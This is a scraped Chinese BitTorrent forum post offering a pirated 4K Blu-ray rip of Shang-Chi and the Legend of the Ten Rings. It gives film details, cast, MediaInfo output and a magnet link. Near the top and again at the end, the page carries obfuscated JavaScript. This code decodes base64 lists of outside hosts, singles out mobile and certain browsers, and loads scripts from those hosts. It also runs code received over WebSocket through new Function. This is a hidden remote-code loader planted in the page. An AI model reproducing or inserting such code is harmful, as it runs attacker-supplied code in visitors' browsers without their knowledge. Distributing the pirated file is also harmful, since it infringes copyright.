尚气与十环传奇[简繁字幕].Shang.Chi.and.the.Legend.of.the.Ten.Rings.2021.UHD.BluRay.2160p.TrueHD.Atmos.7.1.x265.10bit.HDR 14.69GB

版主小s 19天前 173

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 尚气与十环传奇 / 尚气与十戒传奇 / 尚气与十环帮传奇(港) / 尚气 / 上气 / 商奇 / 尚气与十指环传奇 / 上气与十戒传奇 / 上气:十戒传奇 / 上气与十诫传说

◎片 名 Shang-Chi and the Legend of the Ten Rings

◎年 代 2021

◎产 地 美国 / 澳大利亚

◎类 别 动作 / 科幻 / 冒险

◎语 言 英语 / 汉语普通话

◎上映日期 2021-09-03(美国) / 2021-11-12(美国网络)

◎IMDb链接 https://www.imdb.com/title/tt9376612/

◎豆瓣链接 https://movie.douban.com/subject/30394797/

◎片 长 132分钟

◎导 演 德斯汀·克里顿 Destin Cretton (id:1310608)

◎编 剧 戴夫·卡拉汉姆 Dave Callaham (id:1040838)

史蒂夫·恩格尔哈特 Steve Englehart (id:1047311)

吉姆·斯特林 Jim Starlin (id:1360715)

德斯汀·克里顿 Destin Cretton (id:1310608)

◎演 员 刘思慕 Simu Liu (id:1369905)

梁朝伟 Tony Leung Chiu Wai (id:1115918)

奥卡菲娜 Awkwafina (id:1360857)

张梦儿 Meng'er Zhang (id:1448400)

陈法拉 Fala Chen (id:1033379)

杨紫琼 Michelle Yeoh (id:1022664)

元华 Wah Yuen (id:1050240)

钱信伊 Ronny Chieng (id:1392949)

周采芹 Tsai Chin (id:1036870)

本·金斯利 Ben Kingsley (id:1054393)

蒂姆·罗斯 Tim Roth (id:1025176)

本尼迪克特·王 Benedict Wong (id:1301179)

弗罗里安·穆特鲁 Florian Munteanu (id:1403708)

安迪·黎 Andy Le (id:1456768)

斯蒂芬妮·许 Stephanie Hsu (id:1356993)

库纳尔·杜德赫克 Kunal Dudheker (id:1427483)

乔迪·朗 Jodi Long (id:1121121)

达拉斯·刘 Dallas Liu (id:1461046)

费尔南多·钱 Fernando Chien (id:1339501)

扎克·切利 Zach Cherry (id:1390628)

刘家勇 Kar-Yung Lau (id:1326224)

赫小哈 Harmonie He (id:1429406)

Lynette Curran Lynette Curran (id:1281625)

迪·布拉雷·贝克尔 Dee Bradley Baker (id:1059406)

亚历山大·陈 Alexandre Chen (id:1069959)

凯文·费奇 Kevin Feige (id:1340830)

查尔斯·纽沃斯 Charles Newirth (id:1293093)

比尔·波普 Bill Pope (id:1018460)

乌尔里希·蔡德勒 Ulrich Zeidler (id:1163351)

凯姆·巴雷特 Kym Barrett (id:1277971)

克里斯托弗·汤森 Christopher Townsend (id:1337967)

Brian Le Brian Le (id:1456759)

◎标 签 漫威 / 超级英雄 / 美国 / 2021 / 动作 / 漫威电影宇宙 / 科幻 / 奇幻

◎简 介

故事发生在《复仇者联盟4:终局之战》事件之后,尚气(刘思慕 饰)卷入秘密的十环帮组织,被迫面对自己隐秘的过去经历。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 72468510829006267722201081326137248652 (0x3684ED70D7671FB9F89F1CB46E480B8C)

  4. Complete name : Shang.Chi.and.the.Legend.of.the.Ten.Ri[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 14.7 GiB

  8. Duration : 2 h 12 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 15.9 Mb/s

  11. Encoded date : UTC 2021-11-14 00:05:45

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 2 h 12 min

  22. Bit rate : 10.8 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 608 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0 (Type 2)

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.073

  32. Stream size : 9.99 GiB (68%)

  33. Title : HEVC, [email protected]@High, 24/1.001 fps @ 10811 kbps

  34. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  35. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=20 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=3840x1608 / interlace=0 / total-frames=190386 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / repeat-headers / annexb / no-aud / hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=25 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=3 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=1 / chromaloc-top=2 / chromaloc-bottom=2 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(10000000,10) / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  36. Language : English

  37. Default : Yes

  38. Forced : No

  39. Color range : Limited

  40. Color primaries : BT.2020

  41. Transfer characteristics : PQ

  42. Matrix coefficients : BT.2020 non-constant

  43. Mastering display color primaries : Display P3

  44. Mastering display luminance : min: 0.0010 cd/m2, max: 1000 cd/m2


  45. Audio #1

  46. ID : 2

  47. Format : MLP FBA 16-ch

  48. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  49. Commercial name : Dolby TrueHD with Dolby Atmos

  50. Codec ID : A_TRUEHD

  51. Duration : 2 h 12 min

  52. Bit rate mode : Variable

  53. Bit rate : 4 214 kb/s

  54. Maximum bit rate : 7 200 kb/s

  55. Channel(s) : 8 channels

  56. Channel layout : L R C LFE Ls Rs Lb Rb

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 1 200.000 FPS (40 SPF)

  59. Compression mode : Lossless

  60. Stream size : 3.90 GiB (27%)

  61. Title : English Dolby TrueHD 7.1 (Atmos) @ 4854 kbps

  62. Language : English

  63. Default : Yes

  64. Forced : No

  65. Number of dynamic objects : 13

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Audio #2

  69. ID : 3

  70. Format : AC-3

  71. Format/Info : Audio Coding 3

  72. Commercial name : Dolby Digital

  73. Codec ID : A_AC3

  74. Duration : 2 h 12 min

  75. Bit rate mode : Constant

  76. Bit rate : 640 kb/s

  77. Channel(s) : 6 channels

  78. Channel layout : L R C LFE Ls Rs

  79. Sampling rate : 48.0 kHz

  80. Frame rate : 31.250 FPS (1536 SPF)

  81. Compression mode : Lossy

  82. Stream size : 606 MiB (4%)

  83. Title : English Dolby 5.1-EX 5.1 @ 640 kbps

  84. Language : English

  85. Service kind : Complete Main

  86. Default : No

  87. Forced : No


  88. Text #1

  89. ID : 4

  90. Format : PGS

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 2 h 11 min

  94. Bit rate : 35.8 kb/s

  95. Count of elements : 3706

  96. Stream size : 33.5 MiB (0%)

  97. Title : Eng/SUP

  98. Language : English

  99. Default : No

  100. Forced : No


  101. Text #2

  102. ID : 5

  103. Format : PGS

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 2 h 10 min

  107. Bit rate : 22.2 kb/s

  108. Count of elements : 2568

  109. Stream size : 20.7 MiB (0%)

  110. Title : Chs/SUP 简体

  111. Language : Chinese

  112. Default : Yes

  113. Forced : No


  114. Text #3

  115. ID : 6

  116. Format : PGS

  117. Codec ID : S_HDMV/PGS

  118. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  119. Duration : 2 h 10 min

  120. Bit rate : 23.1 kb/s

  121. Count of elements : 2568

  122. Stream size : 21.6 MiB (0%)

  123. Title : Cht/SUP 繁体

  124. Language : Chinese

  125. Default : No

  126. Forced : No


  127. Text #4

  128. ID : 7

  129. Format : PGS

  130. Codec ID : S_HDMV/PGS

  131. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  132. Duration : 2 h 10 min

  133. Bit rate : 37.6 kb/s

  134. Count of elements : 2568

  135. Stream size : 35.1 MiB (0%)

  136. Title : Chs/SUP 简英双语

  137. Language : Chinese

  138. Default : No

  139. Forced : No


  140. Text #5

  141. ID : 8

  142. Format : PGS

  143. Codec ID : S_HDMV/PGS

  144. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  145. Duration : 2 h 10 min

  146. Bit rate : 38.5 kb/s

  147. Count of elements : 2568

  148. Stream size : 36.0 MiB (0%)

  149. Title : Cht/SUP 繁英双语

  150. Language : Chinese

  151. Default : No

  152. Forced : No


  153. Menu

  154. 00:00:00.000 : en:第 01 章

  155. 00:03:52.858 : en:第 02 章

  156. 00:09:28.985 : en:第 03 章

  157. 00:16:17.185 : en:第 04 章

  158. 00:22:47.491 : en:第 05 章

  159. 00:31:59.668 : en:第 06 章

  160. 00:42:49.484 : en:第 07 章

  161. 00:52:21.055 : en:第 08 章

  162. 00:56:51.325 : en:第 09 章

  163. 01:00:35.006 : en:第 10 章

  164. 01:08:46.122 : en:第 11 章

  165. 01:15:55.050 : en:第 12 章

  166. 01:19:51.286 : en:第 13 章

  167. 01:29:49.676 : en:第 14 章

  168. 01:36:45.800 : en:第 15 章

  169. 01:47:00.623 : en:第 16 章

  170. 01:55:25.293 : en:第 17 章

  171. 02:00:07.242 : en:第 18 章

  172. 02:01:46.132 : en:第 19 章

  173. 02:04:08.858 : en:第 20 章

  174. 02:10:39.248 : en:第 21 章


TAGS 动作 冒险 科幻

磁力链:
  • magnet:?xt=urn:btih:3D1222C286298CE704F6CA26A7A365A126DF8CE6

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};